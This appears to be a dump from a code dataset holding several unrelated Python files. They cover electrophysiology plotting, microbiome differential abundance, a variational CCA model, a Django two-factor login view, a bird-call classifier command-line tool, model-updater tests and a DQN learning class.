axs[0, 1].plot(rs, marker='.', color='k', linestyle='')
axs[0, 1].set_xlabel('Stimulus Number')
axs[0, 1].set_ylabel('Rs (MOhm)')
axs[0, 1].set_ylim(rs_y_min, rs_y_max)
''' Plot averaged EPSC trace overlaying all the individual traces '''
# calculate the mean and the SEM of the entire time series
filt_subtracted = filt_data - filt_baseline
filt_data_mean = filt_subtracted.mean(axis=1)
filt_data_sem = filt_subtracted.sem(axis=1)
filt_data_std = filt_subtracted.std(axis=1)
# calculate auto y min limit for mean + std
mean_std = (filt_data_mean - filt_data_std)
y_min_mean_std = mean_std[5000:].min()
y_min_mean_lim = y_min_mean_std * 1.1 * 1000
# set up time value for length of traces and window of what to plot
sweep_length = len(data) # allow for different sweep length
sweep_time = np.arange(0, sweep_length/10, 0.1) # time of sweeps in ms
# set up length of line for light stimulation
blue_light = np.arange(500, 550, 0.1)
# plot mean data trace with all traces in gray behind
axs[1, 0].plot(sweep_time, filt_subtracted*1000, color='darkgray', linewidth=0.5)
axs[1, 0].plot(sweep_time, filt_data_mean*1000, color='k')
axs[1, 0].hlines(75, 500, 550, color='deepskyblue')
axs[1, 0].set_xlabel('Time (ms)')
axs[1, 0].set_ylabel('Current (pA)')
axs[1, 0].set_xlim(450, 800)
axs[1, 0].set_ylim(y_min_lim, 100)
# plot mean data trace with shaded SEM gray behind
axs[1, 1].plot(sweep_time, filt_data_mean*1000, color='k', label='mean')
axs[1, 1].fill_between(sweep_time,
(filt_data_mean - filt_data_std) * 1000,
(filt_data_mean + filt_data_std) * 1000,
color='darkgray',
label='st. dev.')
axs[1, 1].hlines(75, 500, 550, color='deepskyblue')
axs[1, 1].set_xlabel('Time (ms)')
axs[1, 1].set_ylabel('Current (pA)')
axs[1, 1].set_xlim(450, 800)
axs[1, 1].set_ylim(y_min_mean_lim, 100)
axs[1, 1].legend(loc=1)
# fig
# save figure to file
fig_save_path = os.path.join(figure_dir, genotype + '_' + cell_id)
fig.savefig(fig_save_path + '_summary.png', dpi=300, format='png')
''' Save all sweeps data for raw, filtered and rs to a csv file '''
# save each sweep raw peak, filtered peak, and Rs to file
data_dict = OrderedDict()
data_dict['Raw Peaks (nA)'] = peaks
data_dict['Filtered Peaks (nA)'] = filt_peaks
data_dict['Rs (MOhms)'] = rs
sweep_data = pd.DataFrame(data_dict)
# save all_sweeps_data to file
sweep_path = os.path.join(table_dir, genotype + '_' + cell_id)
sweep_data.to_csv(sweep_path + '_all_sweeps_data.csv',
float_format='%8.4f', index=False, header=True)
''' Find the mean peak epscs for raw, filtered, and rs, and save '''
# find mean, st dev, and sem of all sweeps for raw, filt, and rs
mean = sweep_data.mean()
std = sweep_data.std()
sem = sweep_data.sem()
# combine into dataframe, add measure type string and # of sweeps
summary_data = pd.DataFrame([mean, std, sem])
measures = pd.DataFrame([['mean'], ['st. dev.'], ['sem']],
columns=['Measure'])
summary_data = pd.concat([measures, summary_data], axis=1)
# define path for saving file and save it
summary_path = os.path.join(table_dir, genotype + '_' + cell_id)
summary_data.to_csv(summary_path + '_summary_data.csv',
float_format='%8.4f', index=False)
''' Save metadata to file '''
# add # of sweeps column to metadata
n_sweeps = pd.DataFrame(len(sweep_data), columns=['# Sweeps'])
metadata = pd.concat([metadata, n_sweeps], axis=1)
# define metapath and save metadata to file
meta_path = os.path.join(table_dir, genotype + '_' + cell_id)
metadata.to_csv(meta_path + '_metadata.csv',
float_format='%4.1f', index=False, header=True)
'''take the means of raw, filt, and rs and save to file with single row'''
''' Make into autogenerate a jupyter notebook? '''
| StarcoderdataPython |
16483 | <reponame>sverbanic/ps2-npjBM
from .result import Result
import numpy as np
import pandas as pd
class DiffAbunRes(Result):
def __init__(self, otu_table, transform_pipe=None, percent=False, **kwargs):
super().__init__()
self.pre_vs_skin = diff_rel_abun(otu_table, compare='pre_vs_skin', transform_pipe=transform_pipe,
percent=percent, **kwargs)
self.post_vs_skin = diff_rel_abun(otu_table, compare='post_vs_skin', transform_pipe=transform_pipe,
percent=percent, **kwargs)
self.pre_vs_post = diff_rel_abun(otu_table, compare='pre_vs_post', transform_pipe=transform_pipe,
percent=percent, **kwargs)
@classmethod
def load_default(cls, dataset='filtered', transform_pipe=None, percent=False, data_root=None, **kwargs):
from os import environ
if data_root is None:
if 'DATA_PATH' not in environ:
raise EnvironmentError('Please indicate the root to data folder')
else:
root = environ['DATA_PATH']
else:
root = data_root
from skin_mb.data import OtuTable
return cls(otu_table=OtuTable.from_biom(root + 'otu_tables/' + dataset + '.biom'),
transform_pipe=transform_pipe, percent=percent, **kwargs)
def heatmap(self, compare, ax=None, otu_list=None, subject_list=None,
adjust_patient_id=True, label_mapper=None, z_log=False, **kwargs):
dataset = self.get_data(compare)
if otu_list is None:
otu_list = dataset.index
else:
dataset = dataset.loc[otu_list]
if subject_list is None:
subject_list = dataset.columns
dataset = dataset[subject_list]
if ax is None:
import matplotlib.pyplot as plt
fig = plt.figure(figsize=(len(subject_list)/5, len(otu_list)/5))
ax = fig.add_subplot(111)
if adjust_patient_id:
id_mapper = {col: col-20 for col in dataset.columns}
dataset.rename(columns=id_mapper, inplace=True)
if label_mapper:
dataset.rename(index=label_mapper, inplace=True)
if 'figsize' in kwargs.keys():
_ = kwargs.pop('figsize')
if 'gridspec_kw' in kwargs.keys():
_ = kwargs.pop('gridspec_kw')
from ..visualizers.Heatmap import heatmap
from ..visualizers.PlotTools import CMapsDi
cmap = CMapsDi.BluWhtRed(reverse=True)
im = heatmap(values=dataset, ax=ax, origin='lower', z_log=z_log, zorder=5, nan_color='#AEAEAE', cmap=cmap, **kwargs)
ax.set_xlabel('Patient', fontsize=14)
return im, dataset
def rel_abun(table):
return table.apply(lambda row: row/row.sum(), axis=0)
def clr(table, pseudo_count=0.1):
def clr_row(row):
from scipy.stats import gmean
return np.log((row + pseudo_count)/gmean(row + pseudo_count))
return table.apply(clr_row, axis=0)
def diff(table, subject_list, postfix1, postfix2, percent=False):
diff_mtx = pd.DataFrame(index=table.index, columns=subject_list)
for subject in subject_list:
if percent:
diff_mtx[subject] = (table[str(subject) + postfix1] - table[str(subject) + postfix2])/table[str(subject) + postfix1]
else:
diff_mtx[subject] = table[str(subject) + postfix1] - table[str(subject) + postfix2]
return diff_mtx
def diff_rel_abun(otu_table, compare='wound_vs_skin', transform_pipe=None, pseudo_count=0.1,
percent=False, otu_list=None, subject_list=None):
if subject_list is None:
subject_list = set([int(sample[:2]) for sample in otu_table.sample_list])
if otu_list is None:
otu_list = otu_table.otu_list
if compare.lower() in ['pre_vs_skin']:
postfix1 = 'A'
postfix2 = 'C'
elif compare.lower() in ['pre_vs_post']:
postfix1 = 'A'
postfix2 = 'B'
elif compare.lower() in ['post_vs_skin']:
postfix1 = 'B'
postfix2 = 'C'
else:
raise ValueError("Compare should be 'pre_vs_skin', 'pre_vs_post', or 'post_vs_skin'")
if transform_pipe is None:
transform_pipe = ['rel abun', 'diff']
from functools import partial
transformations = {
'rel abun': rel_abun,
'clr': partial(clr, pseudo_count=pseudo_count),
'diff': partial(diff, subject_list=subject_list,
postfix1=postfix1, postfix2=postfix2, percent=percent)
}
table = otu_table.count_table.loc[otu_list]
for transform in transform_pipe:
table = transformations[transform](table)
return table
| StarcoderdataPython |
1704449 | <gh_stars>0
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.distributions import Normal
from .layers import Encoder, Decoder
from .utils_deep import Optimisation_VAE
import numpy as np
from ..utils.kl_utils import compute_kl, compute_kl_sparse, compute_ll
import pytorch_lightning as pl
from os.path import join
class DVCCA(pl.LightningModule, Optimisation_VAE):
def __init__(
self,
input_dims,
z_dim=1,
hidden_layer_dims=[],
non_linear=False,
learning_rate=0.001,
beta=1,
threshold=0,
trainer_dict=None,
dist='gaussian',
private=True,
**kwargs):
'''
Initialise the Deep Variational Canonical Correlation Analysis model
:param input_dims: columns of input data e.g. [M1 , M2] where M1 and M2 are number of the columns for views 1 and 2 respectively
:param z_dim: number of latent vectors
:param hidden_layer_dims: dimensions of hidden layers for encoder and decoder networks.
:param non_linear: non-linearity between hidden layers. If True ReLU is applied between hidden layers of encoder and decoder networks
:param learning_rate: learning rate of optimisers.
:param beta: weighting factor for Kullback-Leibler divergence term.
:param threshold: TODO - Dropout threshold for sparsity constraint on latent representation. If threshold is 0 then there is no sparsity.
:param private: Label to indicate VCCA or VCCA-private.
'''
super().__init__()
self.save_hyperparameters()
self.model_type = 'DVCCA'
self.input_dims = input_dims
self.hidden_layer_dims = hidden_layer_dims.copy()
self.z_dim = z_dim
self.hidden_layer_dims.append(self.z_dim)
self.non_linear = non_linear
self.beta = beta
self.learning_rate = learning_rate
self.threshold = threshold
self.trainer_dict = trainer_dict
self.dist = dist
self.variational = True
if self.threshold!=0:
self.sparse = True
self.model_type = 'sparse_VAE'
self.log_alpha = torch.nn.Parameter(torch.FloatTensor(1, self.z_dim).normal_(0,0.01))
else:
self.log_alpha = None
self.sparse = False
if private:
self.model_type = 'DVCCA_private'
self.input_dims = input_dims
self.private = private
self.n_views = len(input_dims)
self.__dict__.update(kwargs)
self.encoder = torch.nn.ModuleList([Encoder(input_dim = self.input_dims[0], hidden_layer_dims=self.hidden_layer_dims, sparse=self.sparse, variational=True)])
if private:
self.private_encoders = torch.nn.ModuleList([Encoder(input_dim = input_dim, hidden_layer_dims=self.hidden_layer_dims, sparse=self.sparse, variational=True) for input_dim in self.input_dims])
self.hidden_layer_dims[-1] = z_dim + z_dim
self.decoders = torch.nn.ModuleList([Decoder(input_dim = input_dim, hidden_layer_dims=self.hidden_layer_dims, dist=self.dist, variational=True) for input_dim in self.input_dims])
def configure_optimizers(self):
if self.private:
optimizers = [torch.optim.Adam(self.encoder.parameters(),lr=0.001)] + [torch.optim.Adam(list(self.decoders[i].parameters()),
lr=self.learning_rate) for i in range(self.n_views)]
else:
optimizers = [torch.optim.Adam(self.encoder.parameters(), lr=0.001)] + [torch.optim.Adam(list(self.decoders[i].parameters()),
lr=0.001) for i in range(self.n_views)]
return optimizers
def encode(self, x):
mu, logvar = self.encoder[0](x[0])
if self.private:
mu_tmp = []
logvar_tmp = []
for i in range(self.n_views):
mu_p, logvar_p = self.private_encoders[i](x[i])
mu_ = torch.cat((mu, mu_p),1)
mu_tmp.append(mu_)
logvar_ = torch.cat((logvar, logvar_p),1)
logvar_tmp.append(logvar_)
mu = mu_tmp
logvar = logvar_tmp
return mu, logvar
def reparameterise(self, mu, logvar):
if self.private:
z = []
for i in range(self.n_views):
std = torch.exp(0.5*logvar[i])
eps = torch.randn_like(mu[i])
z.append(mu[i]+eps*std)
else:
std = torch.exp(0.5*logvar)
eps = torch.randn_like(mu)
z = mu+eps*std
return z
def decode(self, z):
x_recon = []
for i in range(self.n_views):
if self.private:
x_out = self.decoders[i](z[i])
else:
x_out = self.decoders[i](z)
x_recon.append(x_out)
return x_recon
def forward(self, x):
self.zero_grad()
mu, logvar = self.encode(x)
z = self.reparameterise(mu, logvar)
x_recon = self.decode(z)
fwd_rtn = {'x_recon': x_recon,
'mu': mu,
'logvar': logvar}
return fwd_rtn
@staticmethod
def calc_kl(self, mu, logvar):
'''
Implementation from: https://arxiv.org/abs/1312.6114
'''
kl = 0
if self.private:
for i in range(self.n_views):
if self.sparse:
kl+= compute_kl_sparse(mu[i], logvar[i])
else:
kl+= compute_kl(mu[i], logvar[i])
else:
if self.sparse:
compute_kl_sparse(mu, logvar)
else:
kl+= compute_kl(mu, logvar)
return self.beta*kl
@staticmethod
def calc_ll(self, x, x_recon):
ll = 0
for i in range(self.n_views):
ll+= compute_ll(x[i], x_recon[i], dist=self.dist)
return ll
def sample_from_normal(self, normal):
return normal.loc
def loss_function(self, x, fwd_rtn):
x_recon = fwd_rtn['x_recon']
mu = fwd_rtn['mu']
logvar = fwd_rtn['logvar']
kl = self.calc_kl(self, mu, logvar)
recon = self.calc_ll(self, x, x_recon)
total = kl + recon
losses = {'total': total,
'kl': kl,
'll': recon}
return losses
def training_step(self, batch, batch_idx, optimizer_idx):
fwd_return = self.forward(batch)
loss = self.loss_function(batch, fwd_return)
self.log(f'train_loss', loss['total'], on_epoch=True, prog_bar=True, logger=True)
self.log(f'train_kl_loss', loss['kl'], on_epoch=True, prog_bar=True, logger=True)
self.log(f'train_ll_loss', loss['ll'], on_epoch=True, prog_bar=True, logger=True)
return loss['total']
def validation_step(self, batch, batch_idx):
fwd_return = self.forward(batch)
loss = self.loss_function(batch, fwd_return)
self.log(f'val_loss', loss['total'], on_epoch=True, prog_bar=True, logger=True)
self.log(f'val_kl_loss', loss['kl'], on_epoch=True, prog_bar=True, logger=True)
self.log(f'val_ll_loss', loss['ll'], on_epoch=True, prog_bar=True, logger=True)
return loss['total']
def on_train_end(self):
self.trainer.save_checkpoint(join(self.output_path, 'model.ckpt')) | StarcoderdataPython |
1902371 | from django.shortcuts import get_object_or_404
from django.contrib.auth import get_user_model
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from django_restframework_2fa.serializers import RequestLoginSerializer
from twilio.base.exceptions import TwilioRestException
User = get_user_model()
class Login2FARequestOTPView(APIView):
'''
This view is used to request an OTP on the user's mobile number for verification.
It uses basic authentication instead of JWTAuthentication.
'''
def post(self, request, format=None):
serialized_data = RequestLoginSerializer(data=request.data)
serialized_data.is_valid(raise_exception=True)
try:
user_instance = User.objects.get(email=serialized_data.validated_data['email'])
except User.DoesNotExist:
return Response({'message':'Account with the provided credentials does not exist.'}, status.HTTP_400_BAD_REQUEST)
if not user_instance.check_password(serialized_data.validated_data['password']):
return Response({'message':'Invalid credentials.'}, status.HTTP_401_UNAUTHORIZED)
try:
response = serialized_data.get_response(user_instance)
except ValueError as e:
return Response({"message": str(e)}, status.HTTP_400_BAD_REQUEST)
except Exception as e:
return Response({"message": str(e)}, status.HTTP_503_SERVICE_UNAVAILABLE)
return Response(response, status=status.HTTP_200_OK ) | StarcoderdataPython |
5087461 | <gh_stars>1-10
from __future__ import print_function
import logging
import os
import sys
from argparse import ArgumentParser, RawDescriptionHelpFormatter
from collections.abc import Iterable
from pprint import pformat
import birdvoxclassify
from birdvoxclassify.core import DEFAULT_MODEL_NAME
from birdvoxclassify.birdvoxclassify_exceptions import BirdVoxClassifyError
# The following line circumvent issue #1715 in xgboost
os.environ['KMP_DUPLICATE_LIB_OK'] = 'True'
def get_file_list(input_list):
"""Parse list of input paths."""
if not isinstance(input_list, Iterable)\
or isinstance(input_list, str):
raise BirdVoxClassifyError('input_list must be a non-string iterable')
file_list = []
for item in input_list:
if os.path.isfile(item):
file_list.append(os.path.abspath(item))
elif os.path.isdir(item):
for fname in os.listdir(item):
path = os.path.join(item, fname)
if os.path.isfile(path):
file_list.append(path)
else:
raise BirdVoxClassifyError(
'Could not find input at path {}'.format(item))
return file_list
def run(inputs, output_dir=None, output_summary_path=None,
model_name=DEFAULT_MODEL_NAME, batch_size=512,
select_best_candidates=False, hierarchical_consistency=False,
suffix="", logger_level=logging.INFO):
"""Runs classification model on input audio clips"""
# Set logger level.
logging.getLogger().setLevel(logger_level)
if isinstance(inputs, str):
file_list = [inputs]
elif isinstance(inputs, Iterable):
file_list = get_file_list(inputs)
else:
raise BirdVoxClassifyError('Invalid input: {}'.format(str(inputs)))
if len(file_list) == 0:
info_msg = 'birdvoxclassify: No WAV files found in {}. Aborting.'
logging.info(info_msg.format(str(inputs)))
sys.exit(-1)
# Print header
if output_dir:
logging.info("birdvoxclassify: Output directory = " + output_dir)
if not suffix == "":
logging.info("birdvoxclassify: Suffix string = " + suffix)
# Process all files in the arguments
output = birdvoxclassify.process_file(
file_list,
output_dir=output_dir,
output_summary_path=output_summary_path,
model_name=model_name,
batch_size=batch_size,
select_best_candidates=select_best_candidates,
hierarchical_consistency=hierarchical_consistency,
suffix=suffix,
logger_level=logger_level)
logging.info('birdvoxclassify: Printing output.')
logging.info(pformat(output))
logging.info('birdvoxclassify: Done.')
def parse_args(args):
"""Parses CLI arguments"""
parser = ArgumentParser(
sys.argv[0],
description=main.__doc__,
formatter_class=RawDescriptionHelpFormatter)
parser.add_argument(
'inputs', nargs='*',
help='Path or paths to files to process, or path to '
'a directory of files to process.')
parser.add_argument(
'--output-dir', '-o', default=None, dest='output_dir',
help='Directory to save individual output file(s)')
parser.add_argument(
'--output-summary-path', '-O', default=None, dest='output_summary_path',
help='Directory to save individual output file(s)')
parser.add_argument(
'--select-best-candidates', '-B', action='store_true',
dest='select_best_candidates',
help='Select best candidates instead of '
'enumerating all classes in output.')
parser.add_argument(
'--no-hierarchical-consistency', '-N', action='store_false',
dest='hierarchical_consistency',
help='Do not apply hierarchical consistency when selecting best candidates.')
parser.add_argument(
'--model-name', '-c', default=DEFAULT_MODEL_NAME,
dest='model_name',
help='Name of bird species classifier model to be used.')
parser.add_argument(
'--batch-size', '-b', type=positive_int, default=512, dest='batch_size',
help='Input batch size used by classifier model.'
)
parser.add_argument(
'--suffix', '-s', default="", dest='suffix',
help='String to append to the output filenames.'
'The default value is the empty string.')
parser.add_argument(
'--quiet', '-q', action='store_true', dest='quiet',
help='Print less messages on screen.')
parser.add_argument(
'--verbose', '-v', action='store_true', dest='verbose',
help='Print timestamps of classified events.')
parser.add_argument(
'--version', '-V', action='store_true', dest='version',
help='Print version number.')
args = parser.parse_args(args)
if args.quiet and args.verbose:
raise BirdVoxClassifyError(
'Command-line flags --quiet (-q) and --verbose (-v) '
'are mutually exclusive.')
return args
def main():
"""
Classifies nocturnal flight calls from audio by means of the
BirdVoxClassify deep learning model.
"""
args = parse_args(sys.argv[1:])
if args.version:
print(birdvoxclassify.version.version)
return
if args.quiet:
logger_level = 30
elif args.verbose:
logger_level = 20
else:
logger_level = 25
run(args.inputs,
output_dir=args.output_dir,
output_summary_path=args.output_summary_path,
model_name=args.model_name,
batch_size=args.batch_size,
select_best_candidates=args.select_best_candidates,
hierarchical_consistency=args.hierarchical_consistency,
suffix=args.suffix,
logger_level=logger_level)
def positive_int(value):
"""An argparse-like method for accepting only positive number"""
try:
fvalue = int(value)
except (ValueError, TypeError) as e:
raise BirdVoxClassifyError(
'Expected a positive int, error message: {}'.format(e))
if fvalue <= 0:
raise BirdVoxClassifyError('Expected a positive integer')
return fvalue
| StarcoderdataPython |
11235240 | from django.shortcuts import render, get_object_or_404
from django.http import JsonResponse
from .models import ArchivePost
def archive_post_year_list(request):
year_list = ArchivePost.objects.all()
data = {"results": list(year_list.values("year"))}
return JsonResponse(data)
def archive_post_year_detail(request, pk):
year_posts = ArchivePost.objects.filter(year=pk)
data = {"results": list(year_posts.values("title", "year", "post_content", "post_summary", "post_image_alt_text"))}
return JsonResponse(data) | StarcoderdataPython |
3242274 | <reponame>radovankavicky/pymaclab
import pymaclab as pm
import pymaclab.modfiles.models as models
rbc = pm.newMOD(models.stable.rbc1_num,mesg=False,ncpus='auto')
# Try to update all of the wrapped objects and test if this has worked
# Do for paramdic, set_item
def test_paramdic_item():
eta_key = 'eta'
eta_old = 2.0
eta_new = 5.0
rbc.updaters.paramdic[eta_key] = eta_new
# Did it work?
assert rbc.updaters.paramdic.wrapobj[eta_key] == eta_new
assert rbc.updaters.paramdic[eta_key] == eta_new
assert rbc.paramdic[eta_key] == eta_new
# Do for paramdic, update
def test_paramdic_update():
eta_key = 'eta'
eta_old = 2.0
eta_new = 5.0
rho_key = 'rho'
rho_old = 0.36
rho_new = 0.35
tmp_dic = {}
tmp_dic[eta_key] = eta_new
tmp_dic[rho_key] = rho_new
rbc.updaters.paramdic.update(tmp_dic)
# Did it work?
assert rbc.updaters.paramdic.wrapobj[eta_key] == eta_new
assert rbc.updaters.paramdic[eta_key] == eta_new
assert rbc.paramdic[eta_key] == eta_new
assert rbc.updaters.paramdic.wrapobj[rho_key] == rho_new
assert rbc.updaters.paramdic[rho_key] == rho_new
assert rbc.paramdic[rho_key] == rho_new
# Do for nlsubsdic, set_item
def test_nlsubsdic_item():
U_key = '@U(t)'
U_old = 'c(t)**(1-eta)/(1-eta)'
U_new = 'c(t)**(1-eta*1.01)/(1-eta*1.01)'
rbc.updaters.nlsubsdic[U_key] = U_new
# Did it work?
assert rbc.updaters.nlsubsdic.wrapobj[U_key] == U_new
assert rbc.updaters.nlsubsdic[U_key] == U_new
assert rbc.nlsubsdic[U_key] == U_new
# Do for nlsubsdic, update
def test_nlsubsdic_update():
U_key = '@U(t)'
U_old = 'c(t)**(1-eta)/(1-eta)'
U_new = 'c(t)**(1-eta*1.01)/(1-eta*1.01)'
F_key = '@F(t)'
F_old = 'z(t)*k(t-1)**rho'
F_new = 'z(t)*k(t-1)**rho*1.01'
tmp_dic = {}
tmp_dic[U_key] = U_new
tmp_dic[F_key] = F_new
rbc.updaters.nlsubsdic.update(tmp_dic)
# Did it work?
assert rbc.updaters.nlsubsdic.wrapobj[U_key] == U_new
assert rbc.updaters.nlsubsdic[U_key] == U_new
assert rbc.nlsubsdic[U_key] == U_new
assert rbc.updaters.nlsubsdic.wrapobj[F_key] == F_new
assert rbc.updaters.nlsubsdic[F_key] == F_new
assert rbc.nlsubsdic[F_key] == F_new
# Do for vardic, set_item
def test_vardic_item():
var_key = ['c(t)','consumption']
indexo = rbc.vardic['con']['var'].index(var_key)
var_old = 'bk'
var_new = 'cf'
rbc.updaters.vardic['con']['mod'][indexo][1] = var_new
# Did it work?
assert rbc.updaters.vardic.wrapobj['con']['mod'][indexo][1] == var_new
assert rbc.updaters.vardic['con']['mod'][indexo][1] == var_new
assert rbc.vardic['con']['mod'][indexo][1] == var_new
| StarcoderdataPython |
46817 | <gh_stars>1-10
class Recommendation:
def __init__(self, title):
self.title = title
self.wikidata_id = None
self.rank = None
self.pageviews = None
self.url = None
self.sitelink_count = None
def __dict__(self):
return dict(title=self.title,
wikidata_id=self.wikidata_id,
rank=self.rank,
pageviews=self.pageviews,
url=self.url,
sitelink_count=self.sitelink_count)
def incorporate_wikidata_item(self, item):
self.wikidata_id = item.id
self.url = item.url
self.sitelink_count = item.sitelink_count
| StarcoderdataPython |
3444930 | <reponame>MorvanZhou/my_research<filename>self_driving_research_DQN/learning_methods.py
# View more python tutorials on my Youtube and Youku channel!!!
# Youtube video tutorial: https://www.youtube.com/channel/UCdyjiB5H8Pu7aDTNVXTTpcg
# Youku video tutorial: http://i.youku.com/pythontutorial
import pandas as pd
import numpy as np
from multiprocessing import Process, Queue, cpu_count
class DQNNaive:
"""
Deep Q-Networks Recalled Neural Networks.
------------------------------
1, Take action at according to epsilon-greedy policy
2, Store transition (st, at, rt, st+1) in replay memory D
3, Sample random mini-batch of transitions (s, a, r, s') from D
4, Compute Q-learning targets with regard to old, fixed parameters theta
5, Input X = (action, features),
6, output y_predict= Q(s, a, theta),
y = R + gamma * max_a[Q(s', a, theta)]
Use activation function to different layers:
Non_last layer: Rectified Linear Unit (ReLU) OR SoftPlus
Last layer: linear activation function
------------------------------
Methods used in environment:
env.update_environment(state, action_value)
env.get_features(state, action_value)
"""
def __init__(self, all_actions=None, epsilon=0.9, epsilon_decay_rate=0.99,
alpha=0.01, gamma=0.99, search_time=3000, min_alpha=0.001,
momentum=0.95, squ_grad_momentum=0.999, min_squ_grad=0.001, alpha_method='RMSProp', regularization=None,
n_hidden_layers=1, n_hidden_units=None, activation_function='ReLU', memory_capacity=30000,
batch_size=50, rec_his_rate=0.2, target_theta_update_frequency=1000, n_jobs=-1,
replay_start_size=2000):
"""
Parameters
----------
all_actions:
all action values, is an array, shape of (n_actions, ).
epsilon:
epsilon greedy policy.
epsilon_decay_rate:
decay rate accompany with time steps.
alpha:
initial learning rate.
gamma:
discount factor in Q-learning update.
search_time:
For Annealing learning rate.
min_alpha:
The minimum learning rate value.
momentum:
Gradient momentum used by Adam.
squ_grad_momentum:
parameter for RMSProp, squared gradient (denominator) momentum.
min_squ_grad:
parameter for RMSProp, constant added to the squared gradient in the denominator.
alpha_method:
What alpha decay method has been chosen.
regularization:
regularization term of Neural Networks.
n_hidden_layers:
Number of hidden layers.
n_hidden_units:
Number of hidden neurons.
activation_function:
The activation function used in Neural Networks.
memory_capacity:
Number of transitions storing in memory.
batch_size:
mini-batch size to update gradient for each stochastic gradient descent (SGD).
rec_his_rate:
The ratio of most recent transitions in sampled mini-batch.
target_theta_update_frequency:
The frequency (measured in the number of parameter updates) with which the target network is updated.
n_jobs:
Number of CPU used to calculate gradient update.
replay_start_size:
Start replay and learning at this size.
Returns
-------
"""
try:
actions_value = all_actions
actions_label = [str(value) for value in actions_value]
self.actions = pd.Series(data=actions_value, index=actions_label)
except TypeError:
self.actions = all_actions
self.epsilon = epsilon
self.alpha = alpha
self.alpha_method = alpha_method # 'RMSProp', or 'Annealing'
self.squ_grad_momentum = '--' if self.alpha_method in ['Annealing', 'Momentum'] else squ_grad_momentum
if min_squ_grad < alpha**2-0.001 and self.alpha_method != 'Annealing':
raise ValueError('min_squ_grad need greater than alpha^2')
self.min_squ_grad = min_squ_grad
self.learning_time = 0
self.gamma = gamma
self.init_alpha = alpha
self.min_alpha = min_alpha
self.search_time = search_time
self.lambda_reg = regularization
self.enable_alpha_decrease = True
self.learning_method_name = 'DQN_RNNs'
self.activation_function = activation_function
if self.activation_function not in ['ReLU', 'SoftPlus']:
raise NameError("Activation function must in: 'ReLU', 'SoftPlus'")
self.n_layers = n_hidden_layers + 2
self.n_hidden_units = n_hidden_units
# Let W be vectors with one component for each possible feature
self.fixed_Thetas = None # np.array([1,2,3,4,]).T
self.Thetas = None
self.swap_Theta_counting = 0
self.target_theta_update_frequency = target_theta_update_frequency
self.memory_capacity = memory_capacity
self.batch_size = batch_size
self.n_jobs = n_jobs
self.memory = pd.DataFrame()
self.memory_index = 0
self.cost_his = pd.Series()
self.max_action_value_his = pd.Series()
self.momentum = momentum if self.alpha_method in ['Adam', 'RMSProp_DQN', 'Momentum'] else '--'
self.rec_his_rate = rec_his_rate
self.epsilon_decay_rate = epsilon_decay_rate
self.replay_start_size = replay_start_size
def take_and_return_action(self, env, state):
"""
Execute in environment, for each object
return chosen action_label
"""
all_q, all_features = self.get_all_q_and_all_features(env, state)
action_label = self.choose_action(all_q)
self.update_environment(state, action_label, env)
return action_label
def store_transition(self, env, state, action_label, reward, next_state, terminate):
"""
Waite all object updated, get S' and R.
Then store it.
self.memory is pd.Series
"""
# next_state['isTerminate'] = True or False
# next_state['data'] = data
S_A_features = self.get_single_action_features(env, state, action_label)
next_S_As_features = self.get_all_actions_features(env, next_state)
T = pd.Series({'S_A_features': S_A_features, 'A': action_label,
'R': reward, "S'_As_features": next_S_As_features, 'isTerminate': terminate})
if self.memory.empty or self.memory.shape[0] < self.memory_capacity:
self.memory = self.memory.append(T, ignore_index=True)
else:
# restrain the memory size
self.memory.iloc[self.memory_index] = T
if self.memory_index < self.memory_capacity-1:
self.memory_index += 1
else:
self.memory_index = 0
def process_do(self, sub_batch_T, Thetas, cost_queue=None, queue=None, max_action_value_queue=None):
"""
sub_batch_T contains:
S_A_features, A, R, S'_As_features, isTerminate
"""
# all_S_A_features: shape(sample num, features num)
all_S_A_features = np.array([A for A in sub_batch_T['S_A_features'].values]).squeeze(2).T
all_Q = self.get_Q(all_S_A_features, Thetas)
# all_y_predict: shape(sample num, 1)
all_y_predict = all_Q
# all_next_S_As_features: shape(sample num, (features num, all_actions) )
all_next_S_As_features = sub_batch_T["S'_As_features"].values
all_next_Q_max = self.get_next_Q_max(all_next_S_As_features)
# all_isTerminate: shape(sample num, 1)
all_isTerminate = sub_batch_T['isTerminate'][:, np.newaxis]
# next_Q_max = 0 if it's terminate state
np.place(all_next_Q_max, all_isTerminate, 0)
all_reward = sub_batch_T['R'][:, np.newaxis]
# all_y: shape(sample num, 1)
all_y = all_reward + self.gamma * all_next_Q_max
Gradients = self.get_gradients_back_propagate(all_y, all_y_predict, Thetas)
thetas_sum = 0
for thetas in self.Thetas:
thetas_sum += np.square(thetas[1:, :]).sum(0).sum()
cost = 1 / (2 * len(sub_batch_T)) * \
(np.square(all_y-all_y_predict).sum(0).sum() + self.lambda_reg * thetas_sum)
max_action_value = np.max(all_next_Q_max)
print('Max action value: ', max_action_value)
if queue == None and cost_queue == None:
return [Gradients, cost, max_action_value]
else:
queue.put(Gradients)
cost_queue.put(cost)
max_action_value_queue.put(max_action_value)
def get_deltaTheta(self, Gradients):
"""
To calculate deltaTheta part for gradient descent
Parameters
----------
Gradients:
Gradients from back propagation
method_name:
The method used to speed up gradient descent
Returns
-------
deltaTheta
"""
# alpha
if self.alpha_method == 'Annealing':
# Annealing alpha
if self.alpha > self.min_alpha and self.enable_alpha_decrease == True:
self.alpha = self.init_alpha/(1+self.learning_time/self.search_time)
deltaTheta = self.alpha*Gradients
elif self.alpha_method == 'Momentum':
try:
self.last_deltaTheta
except AttributeError:
print('Initialise last deltaTheta')
self.last_deltaTheta = np.zeros_like(Gradients)
if self.alpha > self.min_alpha and self.enable_alpha_decrease == True:
self.alpha = self.init_alpha/(1+self.learning_time/self.search_time)
deltaTheta = self.momentum * self.last_deltaTheta + self.alpha * Gradients
self.last_deltaTheta = deltaTheta
elif self.alpha_method == 'RMSProp':
# RMSProp
try:
self.g
except AttributeError:
print('Initialise cached gradients')
self.g = np.zeros_like(Gradients)
self.g = self.squ_grad_momentum * self.g + (1-self.squ_grad_momentum) * Gradients**2
learning_rate = self.alpha / (np.sqrt(self.g + self.min_squ_grad))
deltaTheta = learning_rate*Gradients
self.average_learning_rate = np.mean(learning_rate)
elif self.alpha_method == 'RMSProp_DQN':
# RMSProp used in DQN
try:
self.g, self.h
except AttributeError:
print('Initialise cached gradients')
self.g = np.zeros_like(Gradients)
self.h = np.zeros_like(Gradients)
self.g = self.squ_grad_momentum * self.g + (1-self.squ_grad_momentum) * Gradients**2
self.h = self.momentum * self.h + (1-self.momentum) * Gradients
value = self.g - self.h**2
np.place(value, value<0, 0)
